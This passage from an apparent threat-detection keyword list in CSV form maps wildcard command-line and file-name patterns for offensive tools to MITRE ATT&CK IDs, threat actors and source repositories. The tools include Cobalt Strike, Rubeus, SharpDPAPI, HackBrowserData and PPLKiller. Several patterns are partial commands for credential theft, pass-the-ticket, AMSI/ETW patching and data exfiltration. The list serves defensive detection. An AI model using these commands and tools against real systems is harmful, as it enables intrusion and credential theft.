T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.asreproast.txt*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*.asse.devtunnels.ms*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*.athena_utils *,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*.beta.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.bin -enc rc4 -lang c -k 3 -o *.bin*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.bin -enc rc4 -lang csharp -k 9*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.bin -enc rot -lang csharp -k 2 -d*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.bin -enc rot -lang rust -k 7*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.bin -enc xor -lang csharp -k 2 -v nickvourd*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.bin -enc xor -lang nim -k 4*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.blog.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.BruteRatel*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*.cobaltstrike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*.cobaltstrike.beacon_keys*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*.com/dcsync/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*.com/SecureAuthCorp*,offensive_tool_keyword,Github Username,github repo hosting exploitation tools for pentesters,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/SecureAuthCorp,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.com/SpiderLabs*,offensive_tool_keyword,Github Username,github repo hosting exploitation tools adn documentation for pentesters,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/SpiderLabs,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.dev.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.doc.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.doc.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.docx.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.events.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.exe --b64 --path * --args ,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*.exe certificates /pvk:*.pvk*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe -group=remote -computername=*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,fp risks,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe * /hide * /range:* /auto:*.*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*.exe * -eventlog *Key Management Service*,offensive_tool_keyword,cobaltstrike,Persistence by writing/reading shellcode from Event Log,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/improsec/SharpEventPersist,1,0,N/A,10,10,348,50,2022-05-27T14:52:02Z,2022-05-20T14:52:56Z -*.exe * --source Persistence*,offensive_tool_keyword,cobaltstrike,Persistence by writing/reading shellcode from Event Log,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/improsec/SharpEventPersist,1,0,N/A,10,10,348,50,2022-05-27T14:52:02Z,2022-05-20T14:52:56Z -*.exe *.bin -enc aes -lang csharp*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.exe *-searchforest*-pwdlastset*,offensive_tool_keyword,Get-RBCD-Threaded,Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments,T1558 - T1208 - T1550 - T1484 - T1486,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/FatRodzianko/Get-RBCD-Threaded,1,0,N/A,N/A,2,115,19,2021-08-10T23:29:48Z,2019-12-21T00:08:28Z -*.exe /disableLSAProtection*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,0,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*.exe /method:create /taskname:* /trigger:* /modifier:* /program:* /argument:*.dll /remoteserver:*,offensive_tool_keyword,ScheduleRunner,A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation,T1210 T1570 T1021 T1550,TA0008,N/A,N/A,Persistence,https://github.com/netero1010/ScheduleRunner,1,0,N/A,N/A,3,299,42,2022-07-05T10:24:45Z,2021-10-12T15:27:32Z -*.exe /wakeall*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*.exe action=GetScheduledTaskCOMHandler*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*.exe action=ListRunningServices*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*.exe action=ListScheduledTasks*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*.exe action=ListTaskNames*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*.exe --adcs * --remote *,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,0,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*.exe app /create /name:* /uncpath:*\\*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,0,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*.exe app /deploy /name:* /groupname:* /assignmentname:*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,0,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*.exe asktgt /user:* /aes256:* /opsec /ptt*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement with Rubeus More stealthy variant but requires the AES256 key (see 'Dumping OS credentials with Mimikatz' section),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe asktgt /user:* /rc4:* /createnetonly:*cmd.exe*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement with Rubeus Pass the ticket to a sacrificial hidden process. allowing you to e.g. steal the token from this process (requires elevation),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe asktgt /user:* /rc4:* /ptt*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement with Rubeus Request a TGT as the target user and pass it into the current session,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe AzureStorage --connectionstring * --filepath * --extensions *,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*.exe -b * -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'*,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation 